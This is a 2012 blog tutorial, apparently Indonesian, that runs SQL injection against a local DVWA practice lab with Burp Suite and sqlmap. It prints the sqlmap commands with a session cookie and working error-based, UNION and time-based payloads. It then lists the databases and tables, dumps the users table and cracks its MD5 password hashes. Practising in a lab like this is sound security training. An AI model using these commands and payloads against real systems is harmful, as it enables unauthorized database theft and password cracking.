Kamis, 09 Februari 2012

Dumping Database

if we attacking system through sqlvuln, we must know where vuln to be found, for that we need application wich checking vuln mysql. i use 2 aplication sqlmap, and burpsuite. lets begin to attack, in my article i use simulation use dvwa, this simulation i be user and search database and i will dump that. ok now lets begin, i run burpsuite and open dvwa website to mybrowser with port proxy 8080,
i get "GET /dvwa/vulnerabilities/sqli/?id=%27or+1%3D1%23&Submit=Submit" and "Cookie: security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0".
now i test it use sqlmap:
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0"

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:15:52

[20:15:52] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:15:52] [INFO] testing connection to the target url
[20:15:52] [INFO] testing if the url is stable, wait a few seconds
[20:15:53] [INFO] url is stable
[20:15:53] [INFO] testing if GET parameter 'id' is dynamic
[20:15:53] [WARNING] GET parameter 'id' appears to be not dynamic
[20:15:53] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[20:15:53] [INFO] testing sql injection on GET parameter 'id'
[20:15:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:53] [INFO] heuristics detected web page charset 'ascii'
[20:15:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:15:53] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[20:15:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:15:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:16:04] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[20:16:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:04] [INFO] target url appears to be UNION injectable with 2 columns
[20:16:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[20:16:06] [INFO] testing if GET parameter 'Submit' is dynamic
[20:16:06] [WARNING] GET parameter 'Submit' appears to be not dynamic
[20:16:06] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[20:16:06] [INFO] testing sql injection on GET parameter 'Submit'
[20:16:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[20:16:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:11] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:16:11] [INFO] manual usage of GET payloads requires url encoding
[20:16:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:16:11

now i check the database
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:16:35

[20:16:35] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:16:35] [INFO] resuming injection data from session file
[20:16:35] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:16:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:16:35] [INFO] manual usage of GET payloads requires url encoding
[20:16:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:35] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[20:16:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:16:35

i get the database now how i can dump it?
sqlmap.py: error: no such option: --D
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -D dvwa --tables

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:20:59

[20:20:59] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:20:59] [INFO] resuming injection data from session file
[20:20:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:20:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:20:59] [INFO] manual usage of GET payloads requires url encoding
[20:20:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:20:59] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[20:20:59] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:20:59

target dump "users"
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -T users --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:38:37

[20:38:37] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:38:37] [INFO] resuming injection data from session file
[20:38:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:38:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:38:37] [INFO] manual usage of GET payloads requires url encoding
[20:38:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:38:37] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[20:38:37] [INFO] fetching current database
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
[20:38:37] [INFO] fetching columns for table 'users' on database 'dvwa'
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
[20:38:38] [INFO] fetching entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[20:38:40] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[20:38:42] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[20:38:44] [INFO] starting dictionary attack (md5_generic_passwd)
[20:38:44] [INFO] found: 'abc123' for user: 'gordonb'                         
[20:38:45] [INFO] found: 'charley' for user: '1337'                           
[20:38:45] [INFO] found: 'letmein' for user: 'pablo'                          
[20:38:46] [INFO] found: 'password' for user: 'admin'                         
[20:39:09] [INFO] 4159708/10006596 words (42%)
Database: dvwa                                                                
Table: users
[5 entries]
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| avatar                                           | first_name | last_name | password                                    | user    | user_id |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| http://127.0.0.1/dvwa/hackable/users/pablo.jpg   | Pablo      | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | pablo   | 4       |
| http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | Gordon     | Brown     | e99a18c428cb38d5f260853678922e03 (abc123)   | gordonb | 2       |
| http://127.0.0.1/dvwa/hackable/users/admin.jpg   | admin      | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin   | 1       |
| http://127.0.0.1/dvwa/hackable/users/smithy.jpg  | Bob        | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | smithy  | 5       |
| http://127.0.0.1/dvwa/hackable/users/1337.jpg    | Hack       | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | 1337    | 3       |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

[20:39:42] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[20:39:42] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:39:42

0 komentar:

Posting Komentar

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Cup3nK - Premium Blogger Themes | Hosted Desktop